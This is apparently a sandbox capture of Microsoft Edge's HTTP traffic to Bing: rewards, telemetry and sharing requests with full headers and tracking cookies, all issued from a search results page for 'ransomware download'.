accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508&PRVCW=1280&PRVCH=609
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: D44D3548A69F4703AD43E934C5108A10 Ref B: LTSEDGE2116 Ref C: 2024-02-29T15:32:32Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:32 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220752.b3272d9
-
POSThttps://www.bing.com/rewardsapp/reportActivity?IG=92027AEB1C3C42769F3D4EA5938FBAC6&IID=SERP.5066&q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531msedge.exeRemote address:92.123.128.152:443RequestPOST /rewardsapp/reportActivity?IG=92027AEB1C3C42769F3D4EA5938FBAC6&IID=SERP.5066&q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531 HTTP/2.0
host: www.bing.com
content-length: 168
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: application/x-www-form-urlencoded
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508&PRVCW=1280&PRVCH=609
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 060DE8296F984011B3B84FE42A9EF1E4 Ref B: LTSEDGE1006 Ref C: 2024-02-29T15:32:32Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:32 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220752.b3272da
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.WPT%22,%22FID%22:%22CI%22,%22Name%22:%22SydneyFullScreenConvViewLoaded%22,%22Text%22:%22ViewLoaded%22}]msedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.WPT%22,%22FID%22:%22CI%22,%22Name%22:%22SydneyFullScreenConvViewLoaded%22,%22Text%22:%22ViewLoaded%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508&PRVCW=1280&PRVCH=609
ResponseHTTP/2.0 200
content-length: 1
content-type: text/html
content-encoding: br
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 65e0a390f6e4439bad5c7372010a10a7
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-I2LgSzFwKoisE5DeV0V9Vekfr3JLAhZDCnpmKdI5A+k='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: 45001C7E55C5489483CAA40CF31E9FC6 Ref B: LTSEDGE1006 Ref C: 2024-02-29T15:32:32Z
date: Thu, 29 Feb 2024 15:32:32 GMT
set-cookie: MUIDB=060B31E3593A60702C3D25D75802611A; expires=Tue, 25-Mar-2025 15:32:32 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=SID=034B4B2409FA6FD22A0A5F1008996ECA; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220752.b3273a7
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.WPT%22,%22FID%22:%22CI%22,%22Name%22:%22SydneyFullScreenConvLoadSydneyConvResWithPayWall%22,%22Text%22:%22false%22}]msedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.WPT%22,%22FID%22:%22CI%22,%22Name%22:%22SydneyFullScreenConvLoadSydneyConvResWithPayWall%22,%22Text%22:%22false%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508&PRVCW=1280&PRVCH=609
ResponseHTTP/2.0 204
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 50AED1AF95684C3DAF121AC2F53D255C Ref B: LON04EDGE0916 Ref C: 2024-02-29T15:32:33Z
date: Thu, 29 Feb 2024 15:32:33 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220753.b327734
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.WPT%22,%22FID%22:%22CI%22,%22Name%22:%22SydneyFullScreenConvUseSydneyPayWall%22,%22Text%22:%22false%22}]msedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.WPT%22,%22FID%22:%22CI%22,%22Name%22:%22SydneyFullScreenConvUseSydneyPayWall%22,%22Text%22:%22false%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508&PRVCW=1280&PRVCH=609
ResponseHTTP/2.0 200
content-length: 15627
content-type: text/html; charset=utf-8
content-encoding: br
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 65e0a3917587419f8690ddf030afda3e
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-5649chGIHlNcZQmDat0EPtHki7x8c6GLFujKcfNiXn8='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: 46006ABB0BF340F29DC8D2C562A9EA91 Ref B: LON04EDGE0916 Ref C: 2024-02-29T15:32:33Z
date: Thu, 29 Feb 2024 15:32:33 GMT
set-cookie: MUIDB=060B31E3593A60702C3D25D75802611A; expires=Tue, 25-Mar-2025 15:32:33 GMT; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220753.b3277d5
-
Remote address:92.123.128.152:443RequestPOST /orgid/idtoken/conditional HTTP/2.0
host: www.bing.com
content-length: 693
cache-control: max-age=0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
origin: https://login.microsoftonline.com
upgrade-insecure-requests: 1
dnt: 1
content-type: application/x-www-form-urlencoded
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://login.microsoftonline.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _Rwho=u=d
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508&PRVCW=1280&PRVCH=609
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 0B488582908044CEA0A3FD0579004422 Ref B: LTSEDGE2018 Ref C: 2024-02-29T15:32:33Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:33 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220753.b327815
-
Remote address:92.123.128.152:443RequestPOST /fd/ls/lsp.aspx? HTTP/2.0
host: www.bing.com
content-length: 254
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _Rwho=u=d
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
cookie: MSPTC=24VD6MM5tsc5y2FUTNLSFZrPy-jNYMoNKw4fRyl88KQ
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508&PRVCW=1280&PRVCH=609
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:32:32.5182754+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=6&RB=0&GB=0&RG=200&RP=3
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 469F579058C548A1BAB7FBA9253D7215 Ref B: LTSEDGE1612 Ref C: 2024-02-29T15:32:33Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:33 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220753.b32783b
-
GEThttps://www.bing.com/sharing/getsharecommoncontrol?CustomizedTitle=Check%20out%20this%20Bing%20answer&CustomizedContent=Here%27s%20an%20answer%20I%20got%20using%20the%20new%20Bing%2C%20the%20world%E2%80%99s%20first%20AI-powered%20answer%20engine.%20Click%20to%20see%20the%20full%20answer%20and%20try%20it%20yourself.&CustomizedShareOutImageThumbnailId=OBFB.73FF6ADE8CC93B6ED1EDA1CE557E2E09&ScenarioNameUsedForLog=Codex_ConversationMode&DisablePositioningActionMenuContent=true&DisableTopActions=true&DisplayMode=modal&ElementIdForPreview=enable&msedge.exeRemote address:92.123.128.152:443RequestGET /sharing/getsharecommoncontrol?CustomizedTitle=Check%20out%20this%20Bing%20answer&CustomizedContent=Here%27s%20an%20answer%20I%20got%20using%20the%20new%20Bing%2C%20the%20world%E2%80%99s%20first%20AI-powered%20answer%20engine.%20Click%20to%20see%20the%20full%20answer%20and%20try%20it%20yourself.&CustomizedShareOutImageThumbnailId=OBFB.73FF6ADE8CC93B6ED1EDA1CE557E2E09&ScenarioNameUsedForLog=Codex_ConversationMode&DisablePositioningActionMenuContent=true&DisableTopActions=true&DisplayMode=modal&ElementIdForPreview=enable& HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
